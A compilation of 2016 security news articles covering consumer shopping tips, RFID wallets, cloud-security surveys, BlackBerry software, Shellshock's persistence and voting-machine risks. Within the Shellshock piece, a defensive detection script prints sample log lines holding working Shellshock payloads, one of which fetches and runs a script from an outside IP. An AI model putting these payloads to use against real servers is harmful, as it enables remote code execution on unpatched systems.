
Security remains top of mind as over 70 per cent of consumers noted they always think about their security/privacy when shopping online, according to Centrify. Unfortunately, despite the changing attitudes towards security, some consumers are still making basic security faux pas online.


Password hygiene is also a continuing problem when shopping online. Nearly 14 per cent admitted that they share passwords with friends and family so those people can log in to their accounts, whilst over 50 per cent said they save passwords on retailers’ websites so as not to forget them. Over half also said that they only sometimes use different passwords for different retailers’ websites.

Most concerning is that one in eight said they would accept discounts and special offers from retailers in exchange for their passwords, highlighting the risks consumers are willing to take in order to save money online.

83 per cent would sometimes, or never, check the security and privacy terms and conditions of the retailer, leaving them wide open to hacking and data theft if shopping with an unknown or untrusted retailer.

On top of this, more than a fifth would still not ensure there is a secure padlock icon in the browser before making their purchases, and 27 per cent said they would only do this on some occasions.

With Black Friday around the corner and the Christmas shopping season well under way for most, frugal shoppers need to consider their online safety before making any purchases.

Centrify offers ten tips for consumers when shopping online:

  • Always shop with reputable sellers, and be cautious when entering URLs. A misspelled domain, or non-‘https’ site could land you on a false site designed to steal your information
  • Ensure you read the site’s privacy policy to understand how and where your personal information is being used. Lack of an easily visible privacy policy should be a red flag to using that site
  • Be suspicious of links in unsolicited emails. Rather than clicking a link in the email, type the address into your browser yourself. Hovering over a link reveals its real destination, which may differ from the text displayed, a sign the link is unsafe
  • Deals that appear too good to be true often are, so treat them with even more caution
  • If an online retailer requests extra personal information, such as a password for your email or bank account as part of the shopping process, do not enter them
  • Secure mobile phones if you plan to use them for shopping by enabling security features such as passwords and encryption
  • Always use different, long, and complex passwords (or passphrases) for each site. If you don’t, and a hacker steals your password for one account they will have free rein over the others! This would have devastating consequences on sites that have your personal and credit card information
  • Enable multi-factor authentication where possible. This involves combining two or more different ‘factors’ for extra security when logging in – such as something an individual has (like an ATM card or smart card), something a user is (such as a biometric characteristic like a fingerprint or retina scan) or something the user knows, like a password
  • Passwords are not meant to be shared. Never give out your passwords online, on the phone or even to friends or family
  • Do not store passwords. Many browsers, programs, or web applications will offer to store your password for you so you only have to enter the password once and never again. While seemingly a convenient option, it is a bad idea to store passwords associated with personal or financial accounts. This is especially true if you use public or shared computers.


Help Net Security

Back in January, I wrote one of my most popular posts ever: “Why you don’t need an RFID-blocking wallet.” As the title suggests, I argued that it’s a waste of money to buy a wallet with special shielding to protect your chipped credit card from RFID scanners wielded by street criminals seeking to snatch your credit card number.

Since then, in true internet tradition, I’ve been called an idiot by dozens of people and received emails from RFID vendors saying I’m a disgrace, the latter begging me to tell people they also need a Faraday bag for their cellphones. (Tip: a GPS receiver only listens to satellites; what gives your location away is what the phone’s apps and radios report, so turn off location services and you don’t need a bag.) I’ve also been emailed by people who are 100 percent sure, without any real evidence, that they were the victims of RFID-scanning criminals.


Part of the confusion stems from the fact that many, if not most, people now have chip-and-pin cards—you can see the shiny chip right on the card, which you stick into a card reader (instead of sliding the card through). People assume chip-and-pin cards are vulnerable to scanning, but they’re not. RFID cards are contactless—and very likely you don’t have one.

Still waiting

Every story about the risks of RFID scanners features a white hat hacker showing it can be done, but not a shred of evidence has emerged that bad guys are sitting on popular corners wirelessly stealing credit card numbers.

I still haven’t heard of a single case of real-life RFID scanning criminality. Even the wallet vendors’ websites have no verifiable links or testimonies from actual victims. To be honest, at this point, I’m surprised an RFID-protection vendor hasn’t paid a criminal to get caught, so they could point to a real-life story.

Plenty of “believers” have told me it’s obvious why the real RFID scanning criminals haven’t been caught yet—it’s a wireless crime. In their world, it’s impossible to catch wireless criminals. Never mind that we’ve been successfully tracking criminals wirelessly and prosecuting them for decades. If there were a huge contingent of RFID criminals, we would eventually catch some, and it would be such big news that it would spread like wildfire across the internet.

If someone stole a credit card number using an RFID scanner, created a counterfeit card, and got busted, as part of the plea agreement the accused would reveal exactly how the crime had been committed. This plea would have details about the scanner, the victims, and how much money had been stolen. That’s how our justice system works. Where are those stories?

Even the popular debunking website Snopes.com has commented on RFID crime, giving it a “Mixture” truth rating. Why “Mixture”? Because it can’t find any real evidence RFID theft is occurring, although it debunks at least one news source that claimed to show a real RFID criminal.

Make no mistake—criminals who want to make money know about this supposedly easy crime. Hacker researchers have been writing about the risks since RFID-enabled items first came out. Here’s an article from industry luminary Bruce Schneier from 2006.

Not cost efficient

Given all this, you might be surprised to learn I think that RFID-scanning criminals do exist. There are nearly 100 videos on the internet from all over the world showing good guy hackers demonstrating how it can be done. It’s a potential risk. But because the real-life occurrence is so rare, it’s a small risk.

Why? Because it’s not cost-efficient. Real-life criminals steal credit card numbers all the time, but they don’t sit on corners for hours hoping to catch a few dozen card numbers. They steal hundreds of thousands of cards and resell them for cheap to anyone who wants to buy them. In 10 minutes, any criminal with enough smarts to even know what RFID scanning is can spend $100 to buy 1,000 credit card numbers off the internet from any number of illegal dealers, with far less risk of being captured on a security camera.

Focus on real threats

I have no problem with someone buying an RFID-protecting wallet or a Faraday bag for a cellphone or car keys. We all make our own risk and buying decisions on a daily basis. I’m just saying that for most people it doesn’t make much sense.

We’re each hit by a myriad of risks every day. In the computer world alone, we get introduced to somewhere around 13 to 16 new individual security vulnerabilities every day, year after year. They never stop coming.

A prudent person looks at the various risks, weighs the likelihood and potential damage of each of them against the other, and picks those to spend time and money on.

I use the example of people who visit me in Key Largo: Almost all of my visitors worry about potential shark attacks when we go snorkeling and diving. Some are so terrified they won’t get in the water. I tell them there has never been a documented, unprovoked shark attack in the history of Key Largo (at least since the 1800s, if not earlier). The risk of shark attacks worldwide is something like one in 1 million (70 to 100 deaths among hundreds of millions of potential encounters). But the odds that those same people might be killed by driving their car to my house are about 1 in 12,300. As humans, we are terrible at ranking risks, even when told the true odds.

Where I was wrong

I have one update to the original post: I said most of the credit cards in the world don’t have RFID in them. That’s still true. But in some countries, like Canada and Poland, RFID-enabled credit cards are the norm. Even in those countries, I can’t find reports of real RFID-scanning criminals.

Of course, cases of RFID-scanning criminals caught by police may simply have not made it to the web yet—but you’d think that the dozens of vendors selling RFID-protecting wallets and purses would be linking to those stories like crazy. Guess what? They haven’t.

Still, if I haven’t convinced you, go ahead and buy that RFID-protecting wallet. It’s your money and your risk decision. Me, I’ll wait until I hear that RFID crime is on the rise—or better yet, until I have an RFID-enabled credit card. Friends who have shown me their RFID wallets did so because their new credit cards came with a chip, which they assumed was RFID in nature. It wasn’t. They were carrying the regular, nonwireless, chip-and-pin cards.



InfoWorld Security Adviser

Security and privacy of data and systems in the cloud remains a top worry for 70% of IT professionals worldwide, up from 63% in 2015, according to a new Cloud Security Survey by Netwrix. The top three cloud security concerns in 2016 are unauthorized access (69%), malware (37%) and denial of service (DoS) attacks (34%).

Cloud security concerns (up to 5)


Even though cloud service providers make security a top priority, cloud computing is still associated with a number of risks, including potential for unauthorized access by employees and third parties, sophisticated attacks, and lack of visibility into what is happening across cloud IT environments.

Netwrix asked more than 600 IT professionals from technology, government, healthcare, finance, manufacturing and other industries about their thoughts on security in the cloud, their readiness to adopt the technology and possible ways to ensure data protection.

Key survey findings

  • Cloud adoption rate has risen during the past year, from 43% of organizations in 2015 to 68% this year. However, only 8% of companies are ready to move their entire IT infrastructure to the cloud in the near future.
  • Security and data privacy is the top concern with cloud (70%) followed by loss of control over data (53%).
  • A hybrid cloud approach is preferred by 55% of organizations that are considering a cloud move; 40% of cloud users are already taking advantage of the hybrid model. This model enables them to balance costs, business benefits and data security.
  • The most common factors that hinder cloud adoption are insufficient security mechanisms (56%), high costs and small budgets (54%), and lack of compliance guarantees (39%).
  • The majority (61%) of respondents indicate that their own employees pose more risk to data security in the cloud than anyone else.
  • The overwhelming majority (95%) of respondents consider visibility into user activities in the cloud to be an important element in cloud providers’ security guarantees.

Cloud technology’s impact on security of IT infrastructure and data


“The 2016 survey has revealed that despite cloud providers trying hard to secure the cloud environments, the majority of IT pros are still not convinced that the technology is safe enough — mainly because of the insider threat. Lack of visibility is the primary reason why security remains the top cloud-related challenge for many organizations. Advanced security solutions and an integrated view of activities both in the cloud and on premises will help companies increase user accountability, detect insider threats faster and prevent data exfiltration, thus minimizing the damage from unauthorized or incorrect user actions,” said Alex Vovk, CEO and co-founder of Netwrix.


Help Net Security

CSO Online | Sep 29, 2016

In the latest episode of Security Sessions, CSO Editor-in-Chief Joan Goodchild speaks with Michael Bruemmer, vice president at Experian Data Breach Resolution, about a recent survey that said companies are unprepared to stop employee-caused data breaches.


InfoWorld Security

The only surprise in this week's announcement that BlackBerry is getting out of the hardware business is that it took this long. CEO John Chen has been hinting broadly for two years that this would happen, and the parade of unsuccessful Android smartphones that followed the parade of unsuccessful BlackBerry 10 OS smartphones pointed in only one direction: the death of hardware.

But BlackBerry was and is not simply a hardware company. Chen has spent considerable effort to transform it into a software company focused mainly on mobile security tools, but also a little on communications tools. Today, BlackBerry has a grab bag of technologies it's acquired to stake out that software claim.


Here's which ones should matter to you and which ones shouldn't.

Good Secure EMM suites

IT has long known and used BlackBerry Enterprise Server (BES), renamed BlackBerry Enterprise Service when it was expanded to support iOS and Android in 2012 following the 2011 acquisition of Ubitexx. BES is now a component of the Good Secure EMM Suites, most of whose other components came from another acquisition, Good Technology, in 2015.

Good is the sole significant survivor of the original, pre-iPhone enterprise mobility management (EMM) providers. Today, newcomers like MobileIron and AirWatch (bought by VMware a few years back) dominate the market, and Microsoft is trying to muscle in with its Enterprise Mobility + Security suite.

Like MobileIron and AirWatch, Good's suites support iOS, Android, Windows 10, and MacOS for what's called omnidevice management. Good also provides the option of wrapping custom applications with its proprietary APIs via the Good Dynamics tools to add security features not natively supported by the iOS and Android APIs; MobileIron and AirWatch offer similar mobile management extensions. And like MobileIron and AirWatch, the Good suites tie into identity management systems -- an essential connection for users entrusted with sensitive corporate data and workflows on both mobile and desktop devices.

Good has a long history in IT, and it remains a real contender for your EMM platform, especially if you've already invested in its tools.

WatchDox

There's a lot of noise lately around document management on mobile devices. Microsoft has one approach for Office 365, Apple has one for e-books in iOS, and every cloud storage vendor has tools to manage document access across devices.

WatchDox, purchased by BlackBerry in 2015, takes a heavy-handed approach, adding digital rights management to files to ensure they can be read and edited only by authorized users. That makes sense for truly critical documents, but it means your people are restricted to using only WatchDox apps for that content -- which may or may not make sense for specific documents and workflows.

WorkLife

Part of the Good product set BlackBerry acquired, this split-billing component tracks cellular data usage by Good Dynamics apps. Ostensibly, it helps IT manage cellular data costs in BYOD scenarios, but in practice, it does not.

That's because users work with many other off-the-shelf apps that don't call the proprietary Dynamics APIs, so their data usage isn't tracked. Besides, if you provide a fixed reimbursement for work use of BYOD items, there's no need to track cellular data for each person to figure out the relative billing balance.

AtHoc

Based on a 2015 acquisition, the AtHoc platform lets you manage crisis communications, such as sending automated messages to staff and others in case of a natural disaster, an unexpected building closure, a mass shooting, or even a meeting delay. AtHoc has no strong relationship to other BlackBerry services, so any decision around its use need not factor other BlackBerry relationships.

Secure messaging: SecuSmart and BBM Secure

BlackBerry bought SecuSmart in 2014 to offer encryption-secured calls and text messaging for Android and iOS smartphones. This was back when former NSA contractor Edward Snowden revealed the U.S. government was snooping on foreign leaders' calls, and governments started seeking a way to block the NSA.

SecuSmart works only on smartphones. Its text-messaging encryption is tied to a mobile phone number, so tablet-based messaging is protected only if it goes through a protected smartphone, such as if an iPad user is using Handoff to text via his or her iPhone.

BlackBerry also offers BBM Secure, which protects text messages on Android and iOS smartphones via the BlackBerry Messenger app. Its capabilities are similar to those of SecuSmart, and it's unclear why BlackBerry offers both options.

Again, note the limitation to smartphones. If you want to secure text messaging across all user devices, look elsewhere.

BlackBerry Messenger

Available for Android and iOS devices for several years now, BBM sought to take advantage of the popularity of the BlackBerry phone's beloved messaging service. It works OK, but if you have multiple devices, it's a pain to use because only one device can be active at a time -- not a restriction on the many other messaging apps available today. Plus, there's no desktop client.

If your concern is privacy, I'd go with Snowden's recommended Signal app instead, from Open Whisper Systems. If you want a great messaging app across all popular devices with good support for voice, text, and video, Signal fits the bill nicely, too.

Dtek for Android

Available for a small number of Android devices, Dtek lets users see what data various apps are monitoring and manage the permissions for each app. That sounds great, until you realize Android Marshmallow (and Nougat) does that natively, with no app needed. In iOS, of course, Apple has long provided this visibility and the controls over apps' use of your data.

BlackBerry Hub for Android

One of the few features in the BlackBerry 10 OS that users liked, the Hub is a central communications zone so that you don't have to switch among apps to handle your various communications channels. I found it overwhelming, but many others really like the Hub.

It's available for Android Marshmallow and later devices; an iOS version is supposedly in the works. BlackBerry Hub is certainly worth a try if you like the idea of a communications hub on your mobile device.

Miscellaneous Android apps

BlackBerry has made some features from its Priv and Dtek Android phones available to other Android devices (not to iOS). If you're the kind of person who likes to use a third-party app rather than the native clients, check them out at the Google Play Store (search for "BlackBerry").

In addition to the Dtek, BBM, and Hub apps already mentioned, the apps compatible with many Android devices include BlackBerry Contacts, BlackBerry Calendar, Tasks by BlackBerry, Notes by BlackBerry, BlackBerry Password Keeper, and BlackBerry Device Search.

Your guess is as good as mine as to how long BlackBerry will continue to develop and support these apps.


InfoWorld Security

Ready for me to go old school? How about SQL Slammer-level old school? More than 13 years after it was first found scurrying around the internet, the SQL Slammer worm can still be found propagating in the wild, albeit minimally, according to IBM Managed Security Services (MSS) data.

But why does such an old threat keep making the rounds more than a decade after its discovery? Some older threats never die because they are easy to exploit: there is always a chance that an unpatched system can be compromised by a tried-and-true bug.

Shellshock Surge

While SQL Slammer is a dated threat that only affected Microsoft SQL Server 2000, we have much more serious and widespread threats following in its footsteps.

Last Saturday marked the two-year anniversary of one of the most infamous bugs of 2014, Shellshock. A recent surge in attacks observed by IBM Managed Security Services suggested the threat is still prevalent.

From Zero Day to Present Day

A roughly 20-year-old vulnerability (CVE-2014-6271) in the GNU Bash shell, which is widely used on Linux, Solaris and Mac OS systems, sparked the wave of attacks known as Shellshock beginning in late September 2014. This first vulnerability gave way to the disclosure of several additional Bash vulnerabilities within a short period (CVE-2014-7186 and CVE-2014-7187), at which point many realized that this was a threat to be reckoned with.

Right at the onset, we observed a significant increase in focused attacks leveraging these vulnerabilities — over 2,000 security events within 24 hours of the Shellshock bug disclosure. To get an idea of the magnitude of this activity, there were just over 7,500 Shellshock security events for the entire month of August 2016, according to IBM MSS data.

When a zero-day vulnerability surfaces, especially a high-profile one that can affect many systems, the corresponding exploit is usually disclosed promptly. With Shellshock, an exploit targeting the first vulnerability was publicly disclosed a mere 28 hours after the zero-day vulnerability emerged.

As news of this vulnerability and its ease of exploitation spread, the number of attackers opting to leverage and exploit it increased tremendously. Attacks came in waves from different source IPs and originating countries, rising in quantity every hour.

Shocking Numbers

As though in anticipation of its anniversary, Shellshock attack activity recently surged to levels not seen since 2015. As of Sept. 22, the month of September accounted for more than 26 percent of the total activity recorded in 2016.

A little over 70 percent of the attack traffic originated in the U.S., whereas another 18 percent comes from Australia. Top targets of these attacks, according to IBM MSS data, include organizations located in U.S. (26 percent), Japan (18 percent), India (16 percent) and Brazil (11 percent).

Shellshock anniversary

Retrospective Perspective

Before Shellshock had us scrambling to patch our systems in 2014, we were running for the hills because of another vulnerability. Heartbleed, which affected OpenSSL, the widely used open-source TLS library, was all over the news.

Heartbleed let attackers remotely read chunks of an affected server process’s memory without logging on or authenticating to it. Successful exploitation could allow attackers to retrieve private keys, passwords or other sensitive information from servers they were not authorized to access.

Shellshock 2

Although a formidable threat when it first surfaced — IBM MSS data revealed over 1.8 million Heartbleed-based attacks by the end of the first month — Heartbleed failed to exhibit the same staying power as its system-crippling cousin, Shellshock.

As shown in the figure above, in the past year, Heartbleed activity indeed paled in comparison to Shellshock, failing to reach even 15 percent of the total number of Shellshock attacks. Even as Shellshock attacks nosedived in November 2015 and continued to wane as we entered 2016, it still managed to maintain its stamina, averaging nearly 7,900 attacks per month throughout 2016.

Who Is Still Riding the Shellshock Wave?

Per IBM MSS data, as of mid-September, the U.S. is the leading country from which Shellshock attacks originate, making up 71 percent of the total in 2016. Approximately 1,800 unique source IPs based in the U.S. were responsible for these attacks. China is in a distant second, making up 8 percent of the Shellshock attacks, followed by Australia and Italy at 6 percent and 3 percent, respectively.

Shellshock 3

Who Is Still Suffering From Shellshock?

The U.S. is also the leading country in terms of organizations targeted by Shellshock, making up 46 percent of the total in 2016. Although Japan was at the top when the threat first materialized, it ranks second in 2016, making up 24 percent of the total on a global scale.

Shellshock 4

In terms of industries most targeted, the information and communication sector, including telecommunications companies as well as those that provide computer programming and consulting services, topped the list in 2016. They sustained over 46 percent of the Shellshock attacks. This makes sense since many major organizations in this space run Linux-based systems in their IT infrastructure and environments.

Shellshock 5

Financial services ranked second at 26 percent, followed closely by manufacturing in third at 16 percent. The finance sector began adopting Linux-based platforms over a decade ago, with early adopters including the Chicago Mercantile Exchange in 2004 and the New York Stock Exchange in 2007. The pervasiveness of the operating system in this sector makes it an attractive target.

UNIX systems, which employ the Bash shell, are also perhaps more prevalent in manufacturing versus other industries. ICS and SCADA hardware might also have a basic UNIX-like firmware running on the device that can’t be easily updated due to special constraints. That could lead to outdated vulnerable services such as SSH, OpenSSL and Apache running on critical devices.

Additionally, the large discrepancy in Shellshock activity observed in information and communications, financial services and manufacturing versus other industries may point to differences in patching practices among those verticals.

Make It Go Away

We wish we could wave a magic wand and make threats like Shellshock go away. But it’s not so simple, unfortunately. Like stains, some cyberthreats are persistently visible, and Shellshock seems bent on sticking around.

So how do you address this issue? Apply the appropriate update for your system. Failure to apply patches and fixes leaves your organization at risk of Shellshock attacks. Timely patch management is vital in organizations of any size. However, depending on the complexity of your environment, this is easier said than done.

Security intelligence and data analytics tools allow your organization to identify the greatest vulnerabilities and prioritize patching, keeping your systems patched and up to date. Virtual patch technology can provide an additional layer of protection. While vendor patches are a first line of defense, protocol analysis, which is incorporated in IBM Security Network Intrusion Prevention product offerings, can provide an additional layer to protect against these types of attacks. In fact, IBM has been helping to protect customers from Shellshock and similar attacks since 2007.
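The script below is an added example, not tooling from the IBM post or its products. It probes a local bash the way the attackers described above do, by exporting a crafted function definition and seeing whether bash runs the command that follows it (CVE-2014-6271), and it also tries the incomplete-fix follow-up CVE-2014-7169, which the article does not name. A third function greps access-log lines for the `() {` marker, raw or URL-encoded, that every Shellshock HTTP payload carries, so the same script doubles as a quick check on whether the "apply the appropriate update" advice has actually landed and whether anyone is knocking. The log lines are constructed for the example and the IP addresses are documentation ranges.

```shell
#!/bin/sh
# Added example (not IBM's tooling): two local Shellshock probes plus a
# log grep for the exploit marker. Sample log lines are constructed.

# Return 0 (true) if the given shell executes the trailing command of an
# exported function definition, i.e. is vulnerable to CVE-2014-6271.
# A patched bash prints nothing (some builds warn on stderr; we drop it).
shellshock_6271_vulnerable() {
    target="${1:-bash}"
    out=$(env x='() { :;}; echo VULNERABLE' "$target" -c 'true' 2>/dev/null)
    [ "$out" = "VULNERABLE" ]
}

# Return 0 if the shell is vulnerable to CVE-2014-7169, the incomplete-fix
# follow-up: the parser leaves ">\" pending, so "echo date" is parsed as a
# redirection and a file named "echo" appears in the working directory.
# Runs in a scratch directory so the probe cannot clobber a real file.
# Returns 2 if no scratch directory could be made (result unknown).
shellshock_7169_vulnerable() {
    target="${1:-bash}"
    dir=$(mktemp -d) || return 2
    ( cd "$dir" && env X='() { (a)=>\' "$target" -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$dir/echo" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

# Constructed Apache combined-format lines: an exploit attempt carried in
# the User-Agent header, a benign request, and a URL-encoded attempt in
# the query string (as it appears in the request line of an access log).
SAMPLE_LOG='203.0.113.5 - - [22/Sep/2016:10:14:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x.sh -O /tmp/x; sh /tmp/x\""
203.0.113.9 - - [22/Sep/2016:10:14:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.12 - - [22/Sep/2016:10:14:03 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 404 210 "-" "curl/7.47.0"'

# The marker every Shellshock payload needs: "() {" with optional spaces,
# either raw (headers) or URL-encoded (query strings). Reads files given
# as arguments, or stdin; prints matching lines, exit 0 on at least one hit.
find_shellshock_hits() {
    grep -E '\(\) *[{]|%28%29(%20)*%7[Bb]' "$@"
}

# Number of hits in the constructed sample log (prints the count).
count_sample_hits() {
    printf '%s\n' "$SAMPLE_LOG" | find_shellshock_hits | wc -l | tr -d ' '
}

# Stand-alone run: report on the local bash, then show the suspicious lines.
if shellshock_6271_vulnerable bash; then echo "bash: CVE-2014-6271 VULNERABLE"; else echo "bash: CVE-2014-6271 not vulnerable"; fi
if shellshock_7169_vulnerable bash; then echo "bash: CVE-2014-7169 VULNERABLE"; else echo "bash: CVE-2014-7169 not vulnerable"; fi
echo "Shellshock markers in sample log: $(count_sample_hits)"
printf '%s\n' "$SAMPLE_LOG" | find_shellshock_hits
```

Point `find_shellshock_hits` at a real access log (`find_shellshock_hits /var/log/apache2/access.log`) to see the same pattern the IBM sensors counted; the URL-encoded alternative matters because many scanners put the payload in the query string rather than a header.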

Let’s hope this upward trend is fleeting, and next year there won’t be any reason to publish an anniversary blog.

To learn more about other older attacks that are still successful, check out the white paper “Beware of Older Cyber Attacks.”



Security Intelligence


People have trouble prioritizing risk. For example, you often hear about the threat of voter fraud, when all evidence suggests that the risks of such fraud are inconsequential. In truth, hacked voting machines are much more likely to affect an election’s outcome. 

Why would an election fraudster try to herd a flock of criminal participants to the polls when one mildly talented hacker could cause far more trouble?


On a state-by-state level, most presidential elections are decided by many thousands of votes. For example, in 2012, Barack Obama beat Mitt Romney by more than 166,000 votes in the swing state of Ohio. Even in the 2000 election, the closest presidential contest ever, what sort of Houdini could have marshaled the miscreants necessary to cast a few hundred fake votes to tip the balance without getting caught? A hack of a single voting machine could accomplish the same objective.

The good news is that voting machines are not connected to the internet, so physical access is required to hack them. The bad news: If you can get to them, they're easy to hack.

Voting machines are dinosaurs

America’s voting machines include both old mechanical devices and voting computers, which tend to run old operating systems on unsupported, out-of-warranty laptops and servers. Today, approximately 70 percent of U.S. voting sites use a voting computer.

It’s amazing how many voting computers still run Microsoft Windows XP, though Microsoft hasn’t supported it or offered critical security patches for years. According to the Brennan Center for Justice at New York University School of Law, 43 of our 50 states have voting computers that are at least 10 years old; 14 of those 43 states use voting computers that are 15 years old or more.

Most of the people in charge of protecting, configuring, updating, deploying, and supporting these devices lack the experience or troubleshooting skills of today’s average teenager. Few understand the security risks involved with the computers they manage.

All voting computers can be hacked

Most voting computer manufacturers (there are at least 15 vendors) believe white hat hacking is a menace. Proactive bug bounty programs do not exist. Only a few states require independent vulnerability audits.

Every independently audited voting computer has been shown to contain numerous, basic, easy-to-exploit vulnerabilities. A fresh report from the Institute for Critical Infrastructure Technology puts it succinctly: “Voter machines, technically, are so riddled with vulnerabilities that even an upstart script kiddie could wreak havoc.” In 2012, white hat hacker Roger Johnston explained to Popular Science how a voting computer’s votes could be changed for less than $10 worth of RadioShack hardware.

Well, at least such hacks require physical access. No one would consider connecting voting computers to the internet and making them exponentially more vulnerable. Right?

The internet voting peril

Wrong. Thirty-plus states and the District of Columbia already allow some votes to be submitted across the internet. More states want to experiment with internet voting. It’s simply a matter of time.

Scores of companies are lobbying for internet voting, including Simply Voting, which touts “flawless elections made simple.” Granted, I’m confident any system is hackable, but at least this vendor seems to understand some of the risks.

I don’t have to think long and hard to imagine a broad, client-side, man-in-the-middle attack, which could flip votes without the vendor or the voter being able to detect it. Sophisticated malware able to accomplish similar tasks, in the form of banking Trojans, has been around for more than a decade.

Keep the vote safe

I know of no independent computer security researcher with voting machine expertise who will tell you that computerized voting is safe as it stands -- or who recommends moving to internet-based voting. Read Bruce Schneier’s latest NSFW rant to get his take on the topic.

Lots of other organizations, such as Verified Voting, are working hard to safeguard our current computerized voting experience. Verified Voting even lets you find out which voting computer or machine your voting precinct uses.

All voting computer experts agree that verified paper audit systems must be maintained to audit and spot-check a voter’s intent. Unfortunately, one quarter of our states don’t require paper trails -- and only 26 require post-election auditing verification.

Why is stealing elections so hard?

Hacking an electronic voting computer isn’t hard, but rigging an election is, mainly because physical access is necessary. Each physical hack adds to the risk of discovery, and you'd need to hit enough machines in the right places without detection to shift an election’s outcome.

Consider the 2000 presidential election. The incredibly tight outcome in Florida could not have been predicted. To swing any election, hackers would need to know who's going to the polls and how many votes would be necessary to offset the early, military, and absentee ballots (which often aren’t counted until after the election). That can’t be done with any level of accuracy.

In today’s world of ultrapolarized politics, where each side accuses the other of “rigging” elections, keeping our elections reliable and tamper-free is paramount. But I don’t think “election observers” and voter IDs will do it. Instead, we need paper trail auditing -- and we need to keep voting off the internet.


InfoWorld Security Adviser

Organizations globally believe they are their own worst enemy when it comes to cybersecurity, with 45 percent saying they are ill-equipped to cope with the threat of malicious insiders and twice as many, 90 percent, calling malicious insiders a major threat to the organizations’ security, according to Mimecast.


“Companies’ IT security priorities usually change depending on different factors, among which the budget and the threat vectors are the most important for most. If last week Oracle’s POS breach was the most debated, most surely retailers using POS devices and all organizations working with financial data have started to check their own systems and to see how they can strengthen their security for that specific threat. In the light of such incidents, insider threats are left out, so it is no wonder that 45 percent are ill-equipped to cope with malicious insiders,” Roman Foeckl, CEO at CoSoSys, told Help Net Security.

“It is also realistic that 90 percent of organizations see malicious insiders as a major threat, but I would include here also negligent insiders. From our encounters with CSOs from organizations in different verticals, we noticed their fear is directed towards insiders in general, not necessarily malicious ones. In case of human error, there is the risk of people uploading sensitive files to unsanctioned applications, copying confidential information to cloud file sharing apps or making print screens of critical data and publishing it on unauthorized online services. Regardless of whether we’re talking about malicious or careless employees, to prevent data losses or thefts, businesses should define what data should or should not be allowed to be transferred and through what channels, whether it’s e-mail, instant messaging, cloud file sharing apps, or portable storage devices,” explains Foeckl.

Is your email security up to par?

Mimecast uncovered that 65 percent of IT security decision makers globally feel their email security systems are inadequately equipped to handle cyber threats.

By concentrating predominantly on perimeter defense and outside threats, organizations around the world struggle with the risk that comes from their own people. This underlines the need for employee awareness and education, and for a cyber resilience strategy that includes both technology- and human-based defenses, especially given that nearly half of the organizations polled in this study felt exposed to malicious insider attacks.

The research also uncovered that:

  • Over half (53 percent) of IT security decision makers view malicious insiders as a moderate or high threat to their organization.
  • One in seven IT security decision makers view malicious insiders as their number one threat.
  • Those who say they’re very equipped on cybersecurity feel virtually just as vulnerable to insider threats as those who believe they aren’t equipped at all (16 percent vs. 17 percent), indicating that the risk of malicious insiders trumps perceptions of security confidence.

“It’s no surprise that even the most cyber-ready companies are terrified of insider threats. It was always possible for employees to steal or misplace valuable corporate data, but never this easy. Cloud services have facilitated the movement of data into and out of the enterprise like never before – which is both a great asset and risk to businesses,” says Andreas Zengel, EMEA CTO at Skyhigh Networks.

“Cloud services have vastly expanded the scope of insider threat. The most common insider threat scenarios – such as a salesperson jumping ship, rogue sys admins or simply employees committing security missteps in the process of doing their job – are all enabled by cloud computing, and much more difficult to detect due to the nature of modern business operations. With the vast amount of interactions with cloud services by each user every day, it is essential that enterprises put in controls and intelligent monitoring solutions that can filter out the noise of day-to-day usage from the activities performed by a malicious insider, pro-actively warn security operations and prevent actions when an anomaly or threat is detected,” Zengel concluded.


Mimecast tips for safeguarding against malicious insiders

1. Assign role-based permissions to administrators to better control access to key systems and limit the ability of a malicious insider to act.

2. Implement internal safeguards and data exfiltration control to detect and mitigate the risk of malicious insiders when they do strike, to cut off their ability to send confidential data outside the network.

3. Offer creative employee security training programs that deter potential malicious insiders in the first place and help others to spot the signs so they can report inappropriate activity to their managers. Then, back that up with effective processes to police and act swiftly in the event of an attack.

4. Nurture a culture of communication within teams to help employees watch out for each other and step in when someone seems like they’ve become disenchanted or are at risk of turning against the company.

5. Train your organization’s leadership to communicate with employees to ensure open communication and awareness.


Help Net Security